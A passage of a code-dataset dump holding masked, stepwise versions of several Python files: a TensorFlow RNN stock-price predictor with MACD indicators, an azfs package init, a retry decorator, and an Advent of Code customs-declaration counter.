range(distance, len(y_test)):\n if y_test[:, ft][index - distance] <= y_test[:, ft][index\n ] and y_test_pred[:, ft][index - distance] <= y_test_pred[:, ft][\n index] or y_test[:, ft][index - distance] >= y_test[:, ft][index\n ] and y_test_pred[:, ft][index - distance] >= y_test_pred[:, ft][\n index]:\n z += 1\n print('Percent of correct predicted direction = {}%'.format(z / len(\n y_test) * 100))\n plt.show()\n\n\n<mask token>\ndf_stock.drop(['Date'], 1, inplace=True)\n<mask token>\nnp.random.shuffle(perm_array)\n\n\ndef get_next_batch(batch_size):\n global index_in_epoch, x_train, perm_array\n start = index_in_epoch\n index_in_epoch += batch_size\n if index_in_epoch > x_train.shape[0]:\n np.random.shuffle(perm_array)\n start = 0\n index_in_epoch = batch_size\n end = index_in_epoch\n return x_train[perm_array[start:end]], y_train[perm_array[start:end]]\n\n\n<mask token>\ntf.reset_default_graph()\n<mask token>\nif CellType == Cell.BasicRNN:\n layers = [tf.contrib.rnn.BasicRNNCell(num_units=n_neurons, activation=\n tf.nn.elu) for layer in range(n_layers)]\nelif CellType == Cell.BasicLSTM:\n layers = [tf.contrib.rnn.BasicLSTMCell(num_units=n_neurons, activation=\n tf.nn.elu) for layer in range(n_layers)]\nelif CellType == Cell.LSTMCellPeephole:\n layers = [tf.contrib.rnn.LSTMCell(num_units=n_neurons, activation=tf.nn\n .leaky_relu, use_peepholes=True) for layer in range(n_layers)]\nelif CellType == Cell.GRU:\n layers = [tf.contrib.rnn.GRUCell(num_units=n_neurons, activation=tf.nn.\n leaky_relu) for layer in range(n_layers)]\n<mask token>\n\n\ndef train_data(model_name):\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n for iteration in range(int(n_epochs * train_set_size / batch_size)):\n x_batch, y_batch = get_next_batch(batch_size)\n sess.run(training_op, feed_dict={X: x_batch, y: y_batch})\n if iteration % int(5 * train_set_size / batch_size) == 0:\n mse_train = loss.eval(feed_dict={X: x_train, y: y_train})\n 
mse_valid = loss.eval(feed_dict={X: x_valid, y: y_valid})\n print('%.2f epochs: MSE train/valid = %.6f/%.6f' % (\n iteration * batch_size / train_set_size, mse_train,\n mse_valid))\n saver.save(sess, 'train_models/' + model_name)\n\n\ndef test(model_name):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.restore(sess, 'train_models/' + model_name)\n y_test_pred = sess.run(outputs, feed_dict={X: x_test})\n show_predictions(1, y_test_pred)\n\n\n<mask token>\nfor i in y_test:\n y_new.append(i[1] * 10000)\n<mask token>\nprint(macd.calculate())\nmacd.validate()\n<mask token>\nprint(tt.calculate())\nplt.figure(figsize=(15, 5))\nplt.subplot(1, 1, 1)\nplt.plot(np.arange(len(y_new)), y_new, color='black', label='test target')\nplt.plot(np.arange(len(macd.macd)), tt.calculate(), color='green', label=\n 'test prediction')\nplt.plot(np.arange(len(macd.macd)), macd.macd_signal_line, color='red',\n label='test prediction')\nplt.show()\n", "step-4": "<mask token>\n\n\nclass Cell(Enum):\n BasicRNN = 1\n BasicLSTM = 2\n LSTMCellPeephole = 3\n GRU = 4\n\n\nvalid_set_size_percentage = 10\ntest_set_size_percentage = 10\ndf = pd.read_csv('data_2019-01-06.csv')\ndf.sort_values('Date')\n\n\ndef normalize_data(df):\n min_max_scaler = sklearn.preprocessing.MinMaxScaler()\n df['Open'] = min_max_scaler.fit_transform(df['Open'].values.reshape(-1, 1))\n df['High'] = min_max_scaler.fit_transform(df['High'].values.reshape(-1, 1))\n df['Low'] = min_max_scaler.fit_transform(df['Low'].values.reshape(-1, 1))\n df['Close'] = min_max_scaler.fit_transform(df['Close'].values.reshape(-\n 1, 1))\n df['Volume'] = min_max_scaler.fit_transform(df['Volume'].values.reshape\n (-1, 1))\n return df\n\n\ndef load_data(stock, seq_len):\n data_raw = stock.values\n data = []\n for index in range(len(data_raw) - seq_len):\n data.append(data_raw[index:index + seq_len])\n data = np.array(data)\n valid_set_size = int(np.round(valid_set_size_percentage / 100 * data.\n shape[0]))\n test_set_size = 
int(np.round(test_set_size_percentage / 100 * data.\n shape[0]))\n train_set_size = data.shape[0] - (valid_set_size + test_set_size)\n x_train = data[:train_set_size, :-1, :]\n y_train = data[:train_set_size, -1, :]\n x_valid = data[train_set_size:train_set_size + valid_set_size, :-1, :]\n y_valid = data[train_set_size:train_set_size + valid_set_size, -1, :]\n x_test = data[train_set_size + valid_set_size:, :-1, :]\n y_test = data[train_set_size + valid_set_size:, -1, :]\n return [x_train, y_train, x_valid, y_valid, x_test, y_test]\n\n\ndef show_predictions(ft, y_test_pred):\n plt.figure(figsize=(15, 5))\n plt.subplot(1, 1, 1)\n plt.plot(np.arange(y_test.shape[0]), y_test[:, ft], color='black',\n label='test target')\n plt.plot(np.arange(y_test_pred.shape[0]), y_test_pred[:, ft], color=\n 'green', label='test prediction')\n plt.title('future stock prices')\n plt.xlabel('time [days]')\n plt.ylabel('normalized price')\n plt.legend(loc='best')\n x = 0\n error_percent = 5\n for index in range(0, len(y_test)):\n if abs(y_test_pred[:, ft][index] - y_test[:, ft][index]) / abs(y_test\n [:, ft][index]) * 100 < error_percent:\n x += 1\n print('Percent of predictions which error is less then {}% = {}%'.\n format(error_percent, x / len(y_test) * 100))\n z = 0\n distance = 10\n for index in range(distance, len(y_test)):\n if y_test[:, ft][index - distance] <= y_test[:, ft][index\n ] and y_test_pred[:, ft][index - distance] <= y_test_pred[:, ft][\n index] or y_test[:, ft][index - distance] >= y_test[:, ft][index\n ] and y_test_pred[:, ft][index - distance] >= y_test_pred[:, ft][\n index]:\n z += 1\n print('Percent of correct predicted direction = {}%'.format(z / len(\n y_test) * 100))\n plt.show()\n\n\ndf_stock = df.copy()\ndf_stock.drop(['Date'], 1, inplace=True)\ncols = list(df_stock.columns.values)\ndf_stock_norm = df_stock.copy()\ndf_stock_norm = normalize_data(df_stock_norm)\nseq_len = 50\nx_train, y_train, x_valid, y_valid, x_test, y_test = load_data(df_stock_norm,\n 
seq_len)\nindex_in_epoch = 0\nperm_array = np.arange(x_train.shape[0])\nnp.random.shuffle(perm_array)\n\n\ndef get_next_batch(batch_size):\n global index_in_epoch, x_train, perm_array\n start = index_in_epoch\n index_in_epoch += batch_size\n if index_in_epoch > x_train.shape[0]:\n np.random.shuffle(perm_array)\n start = 0\n index_in_epoch = batch_size\n end = index_in_epoch\n return x_train[perm_array[start:end]], y_train[perm_array[start:end]]\n\n\nCellType = Cell.BasicRNN\nn_steps = seq_len - 1\nn_inputs = 5\nn_neurons = 200\nn_outputs = 5\nn_layers = 2\nlearning_rate = 0.001\nbatch_size = 50\nn_epochs = 10\ntrain_set_size = x_train.shape[0]\ntest_set_size = x_test.shape[0]\ntf.reset_default_graph()\nX = tf.placeholder(tf.float32, [None, n_steps, n_inputs])\ny = tf.placeholder(tf.float32, [None, n_outputs])\nif CellType == Cell.BasicRNN:\n layers = [tf.contrib.rnn.BasicRNNCell(num_units=n_neurons, activation=\n tf.nn.elu) for layer in range(n_layers)]\nelif CellType == Cell.BasicLSTM:\n layers = [tf.contrib.rnn.BasicLSTMCell(num_units=n_neurons, activation=\n tf.nn.elu) for layer in range(n_layers)]\nelif CellType == Cell.LSTMCellPeephole:\n layers = [tf.contrib.rnn.LSTMCell(num_units=n_neurons, activation=tf.nn\n .leaky_relu, use_peepholes=True) for layer in range(n_layers)]\nelif CellType == Cell.GRU:\n layers = [tf.contrib.rnn.GRUCell(num_units=n_neurons, activation=tf.nn.\n leaky_relu) for layer in range(n_layers)]\nmulti_layer_cell = tf.contrib.rnn.MultiRNNCell(layers)\nrnn_outputs, states = tf.nn.dynamic_rnn(multi_layer_cell, X, dtype=tf.float32)\nstacked_rnn_outputs = tf.reshape(rnn_outputs, [-1, n_neurons])\nstacked_outputs = tf.layers.dense(stacked_rnn_outputs, n_outputs)\noutputs = tf.reshape(stacked_outputs, [-1, n_steps, n_outputs])\noutputs = outputs[:, n_steps - 1, :]\nloss = tf.reduce_mean(tf.square(outputs - y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntraining_op = optimizer.minimize(loss)\n\n\ndef 
train_data(model_name):\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n for iteration in range(int(n_epochs * train_set_size / batch_size)):\n x_batch, y_batch = get_next_batch(batch_size)\n sess.run(training_op, feed_dict={X: x_batch, y: y_batch})\n if iteration % int(5 * train_set_size / batch_size) == 0:\n mse_train = loss.eval(feed_dict={X: x_train, y: y_train})\n mse_valid = loss.eval(feed_dict={X: x_valid, y: y_valid})\n print('%.2f epochs: MSE train/valid = %.6f/%.6f' % (\n iteration * batch_size / train_set_size, mse_train,\n mse_valid))\n saver.save(sess, 'train_models/' + model_name)\n\n\ndef test(model_name):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.restore(sess, 'train_models/' + model_name)\n y_test_pred = sess.run(outputs, feed_dict={X: x_test})\n show_predictions(1, y_test_pred)\n\n\nmodel = ['train_model', 'train_model_LSTM', 'train_model_with_batch_500',\n 'train_model_with_layers_4', 'train_model_with_volume',\n 'model_seq_len_100', 'model_GRU', 'model_LSTM_pipehole']\ny_new = []\nfor i in y_test:\n y_new.append(i[1] * 10000)\nmacd = trend.MovingAverageConvergenceDivergence(y_new)\nprint(macd.calculate())\nmacd.validate()\ntt = trend.ExponentialMovingAverage(y_new, 10)\nprint(tt.calculate())\nplt.figure(figsize=(15, 5))\nplt.subplot(1, 1, 1)\nplt.plot(np.arange(len(y_new)), y_new, color='black', label='test target')\nplt.plot(np.arange(len(macd.macd)), tt.calculate(), color='green', label=\n 'test prediction')\nplt.plot(np.arange(len(macd.macd)), macd.macd_signal_line, color='red',\n label='test prediction')\nplt.show()\n", "step-5": "import numpy as np\nimport pandas as pd\nimport sklearn\nimport sklearn.preprocessing\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom enum import Enum\nfrom pytalib.indicators import trend\nfrom pytalib.indicators import base\n\n\nclass Cell(Enum):\n BasicRNN = 1\n BasicLSTM = 2\n LSTMCellPeephole = 3\n GRU = 
4\n\n\nvalid_set_size_percentage = 10\ntest_set_size_percentage = 10\n\ndf = pd.read_csv('data_2019-01-06.csv')\ndf.sort_values('Date')\n\n\n# function for min-max normalization of stock\ndef normalize_data(df):\n min_max_scaler = sklearn.preprocessing.MinMaxScaler()\n df['Open'] = min_max_scaler.fit_transform(df['Open'].values.reshape(-1, 1))\n df['High'] = min_max_scaler.fit_transform(df['High'].values.reshape(-1, 1))\n df['Low'] = min_max_scaler.fit_transform(df['Low'].values.reshape(-1, 1))\n df['Close'] = min_max_scaler.fit_transform(df['Close'].values.reshape(-1, 1))\n df['Volume'] = min_max_scaler.fit_transform(df['Volume'].values.reshape(-1, 1))\n return df\n\n\n# function to create train, validation, test data given stock data and sequence length\ndef load_data(stock, seq_len):\n data_raw = stock.values # convert to numpy array\n data = []\n\n # create all possible sequences of length seq_len\n for index in range(len(data_raw) - seq_len):\n data.append(data_raw[index: index + seq_len])\n\n data = np.array(data)\n valid_set_size = int(np.round(valid_set_size_percentage / 100 * data.shape[0]))\n test_set_size = int(np.round(test_set_size_percentage / 100 * data.shape[0]))\n train_set_size = data.shape[0] - (valid_set_size + test_set_size)\n\n x_train = data[:train_set_size, :-1, :]\n y_train = data[:train_set_size, -1, :]\n\n x_valid = data[train_set_size:train_set_size + valid_set_size, :-1, :]\n y_valid = data[train_set_size:train_set_size + valid_set_size, -1, :]\n\n x_test = data[train_set_size + valid_set_size:, :-1, :]\n y_test = data[train_set_size + valid_set_size:, -1, :]\n\n return [x_train, y_train, x_valid, y_valid, x_test, y_test]\n\n\n# show predictions: 0 = open, 1 = close, 2 = highest, 3 = lowest, 4 = volume\ndef show_predictions(ft, y_test_pred):\n plt.figure(figsize=(15, 5))\n plt.subplot(1, 1, 1)\n plt.plot(np.arange(y_test.shape[0]),\n y_test[:, ft], color='black', label='test target')\n\n plt.plot(np.arange(y_test_pred.shape[0]),\n 
y_test_pred[:, ft], color='green', label='test prediction')\n\n plt.title('future stock prices')\n plt.xlabel('time [days]')\n plt.ylabel('normalized price')\n plt.legend(loc='best')\n\n x = 0\n error_percent = 5\n for index in range(0, len(y_test)):\n if (abs((y_test_pred[:, ft][index] - y_test[:, ft][index])) / abs(y_test[:, ft][index]) * 100) < error_percent:\n x += 1\n print(\"Percent of predictions which error is less then {}% = {}%\".format(error_percent, x / len(y_test) * 100))\n\n # Calculating the direction between 2 points using true values and predicted values\n z = 0\n distance = 10\n for index in range(distance, len(y_test)):\n if (y_test[:, ft][index - distance] <= y_test[:, ft][index] and y_test_pred[:, ft][index - distance] <=\n y_test_pred[:, ft]\n [index]) or (\n y_test[:, ft][index - distance] >= y_test[:, ft][index] and y_test_pred[:, ft][index - distance]\n >= y_test_pred[:, ft][index]):\n z += 1\n print(\"Percent of correct predicted direction = {}%\".format(z / len(y_test) * 100))\n\n plt.show()\n\n\n# choose one stock\ndf_stock = df.copy()\ndf_stock.drop(['Date'], 1, inplace=True)\ncols = list(df_stock.columns.values)\n\n# normalize stock\ndf_stock_norm = df_stock.copy()\ndf_stock_norm = normalize_data(df_stock_norm)\n\n# create train, test data\nseq_len = 50 # choose sequence length\nx_train, y_train, x_valid, y_valid, x_test, y_test = load_data(df_stock_norm, seq_len)\n\nindex_in_epoch = 0\nperm_array = np.arange(x_train.shape[0])\nnp.random.shuffle(perm_array)\n\n\n# function to get the next batch\ndef get_next_batch(batch_size):\n global index_in_epoch, x_train, perm_array\n start = index_in_epoch\n index_in_epoch += batch_size\n\n if index_in_epoch > x_train.shape[0]:\n np.random.shuffle(perm_array) # shuffle permutation array\n start = 0 # start next epoch\n index_in_epoch = batch_size\n\n end = index_in_epoch\n return x_train[perm_array[start:end]], y_train[perm_array[start:end]]\n\n\n# parameters\nCellType = Cell.BasicRNN\nn_steps = 
seq_len - 1\nn_inputs = 5\nn_neurons = 200\nn_outputs = 5\nn_layers = 2\nlearning_rate = 0.001\nbatch_size = 50\nn_epochs = 10\ntrain_set_size = x_train.shape[0]\ntest_set_size = x_test.shape[0]\n\ntf.reset_default_graph()\n\nX = tf.placeholder(tf.float32, [None, n_steps, n_inputs])\ny = tf.placeholder(tf.float32, [None, n_outputs])\n\nif CellType == Cell.BasicRNN:\n layers = [tf.contrib.rnn.BasicRNNCell(num_units=n_neurons, activation=tf.nn.elu)\n for layer in range(n_layers)]\nelif CellType == Cell.BasicLSTM:\n layers = [tf.contrib.rnn.BasicLSTMCell(num_units=n_neurons, activation=tf.nn.elu)\n for layer in range(n_layers)]\nelif CellType == Cell.LSTMCellPeephole:\n layers = [tf.contrib.rnn.LSTMCell(num_units=n_neurons,\n activation=tf.nn.leaky_relu, use_peepholes=True)\n for layer in range(n_layers)]\nelif CellType == Cell.GRU:\n layers = [tf.contrib.rnn.GRUCell(num_units=n_neurons, activation=tf.nn.leaky_relu)\n for layer in range(n_layers)]\n\nmulti_layer_cell = tf.contrib.rnn.MultiRNNCell(layers)\nrnn_outputs, states = tf.nn.dynamic_rnn(multi_layer_cell, X, dtype=tf.float32)\n\nstacked_rnn_outputs = tf.reshape(rnn_outputs, [-1, n_neurons])\nstacked_outputs = tf.layers.dense(stacked_rnn_outputs, n_outputs)\noutputs = tf.reshape(stacked_outputs, [-1, n_steps, n_outputs])\noutputs = outputs[:, n_steps - 1, :] # keep only last output of sequence\n\nloss = tf.reduce_mean(tf.square(outputs - y)) # loss function = mean squared error\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntraining_op = optimizer.minimize(loss)\n\n\n# run graph\ndef train_data(model_name):\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n for iteration in range(int(n_epochs * train_set_size / batch_size)):\n x_batch, y_batch = get_next_batch(batch_size) # fetch the next training batch\n sess.run(training_op, feed_dict={X: x_batch, y: y_batch})\n if iteration % int(5 * train_set_size / batch_size) == 0:\n mse_train = 
loss.eval(feed_dict={X: x_train, y: y_train})\n mse_valid = loss.eval(feed_dict={X: x_valid, y: y_valid})\n print('%.2f epochs: MSE train/valid = %.6f/%.6f' % (\n iteration * batch_size / train_set_size, mse_train, mse_valid))\n saver.save(sess, 'train_models/' + model_name)\n\n\ndef test(model_name):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.restore(sess, 'train_models/' + model_name)\n y_test_pred = sess.run(outputs, feed_dict={X: x_test})\n show_predictions(1, y_test_pred)\n\n\nmodel = ['train_model', 'train_model_LSTM', 'train_model_with_batch_500', 'train_model_with_layers_4',\n 'train_model_with_volume', 'model_seq_len_100', \"model_GRU\", 'model_LSTM_pipehole']\n\n# train_data(model[0])\n# test(model[0])\ny_new = []\nfor i in y_test:\n y_new.append(i[1] * 10000)\nmacd = trend.MovingAverageConvergenceDivergence(y_new)\nprint(macd.calculate())\nmacd.validate()\n\ntt = trend.ExponentialMovingAverage(y_new, 10)\nprint(tt.calculate())\n\nplt.figure(figsize=(15, 5))\nplt.subplot(1, 1, 1)\nplt.plot(np.arange(len(y_new)), y_new, color='black', label='test target')\nplt.plot(np.arange(len(macd.macd)), tt.calculate(), color='green', label='test prediction')\nplt.plot(np.arange(len(macd.macd)), macd.macd_signal_line, color='red', label='test prediction')\nplt.show()\n", "step-ids": [ 7, 8, 9, 10, 12 ] }
[ 7, 8, 9, 10, 12 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> VERSION = 0, 2, 14 __version__ = '.'.join(map(str, VERSION)) __all__ = ['AzFileClient', 'AzFileSystem', 'BlobPathDecoder', 'TableStorage', 'TableStorageWrapper', 'export_decorator'] <|reserved_special_token_1|> from azfs.az_file_client import AzFileClient, export_decorator from azfs.az_file_system import AzFileSystem from azfs.utils import BlobPathDecoder from .table_storage import TableStorage, TableStorageWrapper VERSION = 0, 2, 14 __version__ = '.'.join(map(str, VERSION)) __all__ = ['AzFileClient', 'AzFileSystem', 'BlobPathDecoder', 'TableStorage', 'TableStorageWrapper', 'export_decorator'] <|reserved_special_token_1|> from azfs.az_file_client import ( AzFileClient, export_decorator ) from azfs.az_file_system import AzFileSystem from azfs.utils import BlobPathDecoder from .table_storage import ( TableStorage, TableStorageWrapper ) # comparable tuple VERSION = (0, 2, 14) # generate __version__ via VERSION tuple __version__ = ".".join(map(str, VERSION)) __all__ = [ "AzFileClient", "AzFileSystem", "BlobPathDecoder", "TableStorage", "TableStorageWrapper", "export_decorator" ]
flexible
{ "blob_id": "e7239b4bc3db9bd427b9be888621f66e81b5edeb", "index": 2242, "step-1": "<mask token>\n", "step-2": "<mask token>\nVERSION = 0, 2, 14\n__version__ = '.'.join(map(str, VERSION))\n__all__ = ['AzFileClient', 'AzFileSystem', 'BlobPathDecoder',\n 'TableStorage', 'TableStorageWrapper', 'export_decorator']\n", "step-3": "from azfs.az_file_client import AzFileClient, export_decorator\nfrom azfs.az_file_system import AzFileSystem\nfrom azfs.utils import BlobPathDecoder\nfrom .table_storage import TableStorage, TableStorageWrapper\nVERSION = 0, 2, 14\n__version__ = '.'.join(map(str, VERSION))\n__all__ = ['AzFileClient', 'AzFileSystem', 'BlobPathDecoder',\n 'TableStorage', 'TableStorageWrapper', 'export_decorator']\n", "step-4": "from azfs.az_file_client import (\n AzFileClient,\n export_decorator\n)\n\nfrom azfs.az_file_system import AzFileSystem\nfrom azfs.utils import BlobPathDecoder\n\nfrom .table_storage import (\n TableStorage,\n TableStorageWrapper\n)\n\n# comparable tuple\nVERSION = (0, 2, 14)\n# generate __version__ via VERSION tuple\n__version__ = \".\".join(map(str, VERSION))\n\n__all__ = [\n \"AzFileClient\",\n \"AzFileSystem\",\n \"BlobPathDecoder\",\n \"TableStorage\",\n \"TableStorageWrapper\",\n \"export_decorator\"\n]\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
from functools import wraps from time import sleep def retry(retry_count = 2, delay = 5, action_description = 'not specified', allowed_exceptions=()): def decorator(func): @wraps(func) # to preserve metadata of the function to be decorated def wrapper(*args, **kwargs): for _ in range(retry_count): try: return func(*args, **kwargs) except allowed_exceptions as e: print('Error executing {}: {}'.format(func.__name__, e)) print('Waiting for {} sec before executing {} again'.format(delay, func.__name__)) sleep(delay) print('Retrying to execute ' + func.__name__ + ' (action: ' + action_description + ')') return wrapper return decorator
normal
{ "blob_id": "79e4592d5ea84cc7c97d68a9390eb5d387045cf0", "index": 4344, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef retry(retry_count=2, delay=5, action_description='not specified',\n allowed_exceptions=()):\n\n def decorator(func):\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n for _ in range(retry_count):\n try:\n return func(*args, **kwargs)\n except allowed_exceptions as e:\n print('Error executing {}: {}'.format(func.__name__, e))\n print('Waiting for {} sec before executing {} again'.\n format(delay, func.__name__))\n sleep(delay)\n print('Retrying to execute ' + func.__name__ +\n ' (action: ' + action_description + ')')\n return wrapper\n return decorator\n", "step-3": "from functools import wraps\nfrom time import sleep\n\n\ndef retry(retry_count=2, delay=5, action_description='not specified',\n allowed_exceptions=()):\n\n def decorator(func):\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n for _ in range(retry_count):\n try:\n return func(*args, **kwargs)\n except allowed_exceptions as e:\n print('Error executing {}: {}'.format(func.__name__, e))\n print('Waiting for {} sec before executing {} again'.\n format(delay, func.__name__))\n sleep(delay)\n print('Retrying to execute ' + func.__name__ +\n ' (action: ' + action_description + ')')\n return wrapper\n return decorator\n", "step-4": "from functools import wraps\nfrom time import sleep\n\ndef retry(retry_count = 2, delay = 5, action_description = 'not specified', allowed_exceptions=()):\n def decorator(func):\n @wraps(func) # to preserve metadata of the function to be decorated\n def wrapper(*args, **kwargs):\n for _ in range(retry_count): \n try:\n return func(*args, **kwargs)\n except allowed_exceptions as e:\n print('Error executing {}: {}'.format(func.__name__, e))\n print('Waiting for {} sec before executing {} again'.format(delay, func.__name__))\n sleep(delay)\n print('Retrying to execute ' + func.__name__ + ' (action: ' + action_description + ')')\n return wrapper\n 
return decorator", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> from .file_uploader_routes import FILE_UPLOADER_BLUEPRINT
flexible
{ "blob_id": "c7dacdb53efb6935314c5e3718a4a2f1d862b07d", "index": 2340, "step-1": "<mask token>\n", "step-2": "from .file_uploader_routes import FILE_UPLOADER_BLUEPRINT\n", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> for line in lines: if line == '\n' or line == lines[-1]: if line == lines[-1]: line = line.strip() group_responses.append(line) group_responses_flattened = [item for sublist in group_responses for item in sublist] group_responses_set = set(group_responses_flattened) count_any_member_has_response += len(group_responses_set) for char in group_responses[0]: char_in_all_members = True for item in group_responses: if char not in item: char_in_all_members = False if char_in_all_members == True: count_all_members_have_response += 1 group_responses = [] else: line = line.strip() group_responses.append(line) print('TOTAL COUNT FOR ANY MEMBER HAS RESPONSE =', count_any_member_has_response) print('TOTAL COUNT FOR ALL MEMBER HAVE RESPONSES =', count_all_members_have_response) <|reserved_special_token_1|> declarations_file = open('day6_declarations.txt', 'r') lines = declarations_file.readlines() group_responses = [] count_any_member_has_response = 0 count_all_members_have_response = 0 for line in lines: if line == '\n' or line == lines[-1]: if line == lines[-1]: line = line.strip() group_responses.append(line) group_responses_flattened = [item for sublist in group_responses for item in sublist] group_responses_set = set(group_responses_flattened) count_any_member_has_response += len(group_responses_set) for char in group_responses[0]: char_in_all_members = True for item in group_responses: if char not in item: char_in_all_members = False if char_in_all_members == True: count_all_members_have_response += 1 group_responses = [] else: line = line.strip() group_responses.append(line) print('TOTAL COUNT FOR ANY MEMBER HAS RESPONSE =', count_any_member_has_response) print('TOTAL COUNT FOR ALL MEMBER HAVE RESPONSES =', count_all_members_have_response) <|reserved_special_token_1|> # read in file of customs declaration responses declarations_file = open('day6_declarations.txt', 'r') lines = 
declarations_file.readlines() # initialise variables group_responses = [] # temporary container for all responses of each group member count_any_member_has_response = 0 # count for part 1 count_all_members_have_response = 0 # count for part 2 # loop over file for line in lines: # if have a blank line (or at end of file), means we have reached end of # an group's info, so save declaration response info for current group # and reset group_responses list if line == '\n' or line == lines[-1]: # case where at end of file, want to save that last line if line == lines[-1]: # remove newlines at end of lines and split by whitespace line = line.strip() group_responses.append(line) #print(group_responses) # PART 1 # for each group, count the number of questions to which ANYONE responded "yes" # what is the sum of those counts? # each group member has their responses as one element in group_responses # so flatten this so each char of each group member now makes up one element group_responses_flattened = [item for sublist in group_responses for item in sublist] # there will be duplicates in the flattened array # first part wants the total number of UNIQUE elements so convert to set group_responses_set = set(group_responses_flattened) #print(group_responses_set) # count number of unique elements in the set and add this to # the count_any_member_has_response var which keeps track of the total count # for all groups count_any_member_has_response += len(group_responses_set) # PART 2 # for each group, count the number of questions to which EVERYONE answered "yes" # what is the sum of those counts? 
# easiest way is to look at first group member # how many of the characters for the first group member # appear for ALL the other group members for char in group_responses[0]: char_in_all_members = True # see if char exists for all other group members - if not then set # char_in_all_members to False for item in group_responses: if char not in item: char_in_all_members = False # if char appears for all members, add one to # count_all_members_have_response var which keeps track of the total count # for all groups if char_in_all_members == True: #print('char', char, 'exists for all members of this group') count_all_members_have_response += 1 # finished processing this group so reset the temp var group_responses # so it can be filled again for the next group group_responses = [] else: # we are still in the same group so continue adding # group member responses to group_responses list line = line.strip() group_responses.append(line) # print out final counts for parts 1 and 2 print('TOTAL COUNT FOR ANY MEMBER HAS RESPONSE =', count_any_member_has_response) print('TOTAL COUNT FOR ALL MEMBER HAVE RESPONSES =', count_all_members_have_response)
flexible
{ "blob_id": "cb6ed6422a5591f1de0a947f75ad080f250e8443", "index": 7718, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor line in lines:\n if line == '\\n' or line == lines[-1]:\n if line == lines[-1]:\n line = line.strip()\n group_responses.append(line)\n group_responses_flattened = [item for sublist in group_responses for\n item in sublist]\n group_responses_set = set(group_responses_flattened)\n count_any_member_has_response += len(group_responses_set)\n for char in group_responses[0]:\n char_in_all_members = True\n for item in group_responses:\n if char not in item:\n char_in_all_members = False\n if char_in_all_members == True:\n count_all_members_have_response += 1\n group_responses = []\n else:\n line = line.strip()\n group_responses.append(line)\nprint('TOTAL COUNT FOR ANY MEMBER HAS RESPONSE =',\n count_any_member_has_response)\nprint('TOTAL COUNT FOR ALL MEMBER HAVE RESPONSES =',\n count_all_members_have_response)\n", "step-3": "declarations_file = open('day6_declarations.txt', 'r')\nlines = declarations_file.readlines()\ngroup_responses = []\ncount_any_member_has_response = 0\ncount_all_members_have_response = 0\nfor line in lines:\n if line == '\\n' or line == lines[-1]:\n if line == lines[-1]:\n line = line.strip()\n group_responses.append(line)\n group_responses_flattened = [item for sublist in group_responses for\n item in sublist]\n group_responses_set = set(group_responses_flattened)\n count_any_member_has_response += len(group_responses_set)\n for char in group_responses[0]:\n char_in_all_members = True\n for item in group_responses:\n if char not in item:\n char_in_all_members = False\n if char_in_all_members == True:\n count_all_members_have_response += 1\n group_responses = []\n else:\n line = line.strip()\n group_responses.append(line)\nprint('TOTAL COUNT FOR ANY MEMBER HAS RESPONSE =',\n count_any_member_has_response)\nprint('TOTAL COUNT FOR ALL MEMBER HAVE RESPONSES =',\n count_all_members_have_response)\n", "step-4": "\n\n# read in 
file of customs declaration responses\ndeclarations_file = open('day6_declarations.txt', 'r')\nlines = declarations_file.readlines()\n\n# initialise variables\ngroup_responses = [] # temporary container for all responses of each group member\ncount_any_member_has_response = 0 # count for part 1\ncount_all_members_have_response = 0 # count for part 2\n\n\n# loop over file\nfor line in lines:\n\n\t# if have a blank line (or at end of file), means we have reached end of \n\t# an group's info, so save declaration response info for current group \n\t# and reset group_responses list\n\n\tif line == '\\n' or line == lines[-1]:\n\n\t\t# case where at end of file, want to save that last line\n\t\tif line == lines[-1]:\n\t\t\t\n\t\t\t# remove newlines at end of lines and split by whitespace\n\t\t\tline = line.strip()\n\t\t\tgroup_responses.append(line)\n\t\t\t\n\t\t#print(group_responses)\n\n\t\t\n\n\n\t\t# PART 1\n\t\t# for each group, count the number of questions to which ANYONE responded \"yes\" \n\t\t# what is the sum of those counts?\n\n\t\t# each group member has their responses as one element in group_responses\n\t\t# so flatten this so each char of each group member now makes up one element\n\t\tgroup_responses_flattened = [item for sublist in group_responses for item in sublist]\n\n\t\t# there will be duplicates in the flattened array\n\t\t# first part wants the total number of UNIQUE elements so convert to set\n\t\tgroup_responses_set = set(group_responses_flattened)\n\t\t#print(group_responses_set)\n\n\t\t# count number of unique elements in the set and add this to \n\t\t# the count_any_member_has_response var which keeps track of the total count\n\t\t# for all groups\n\t\tcount_any_member_has_response += len(group_responses_set)\n\n\n\n\n\n\n\t\t# PART 2\n\t\t# for each group, count the number of questions to which EVERYONE answered \"yes\"\n\t\t# what is the sum of those counts?\n\n\t\t# easiest way is to look at first group member\n\t\t# how many of the 
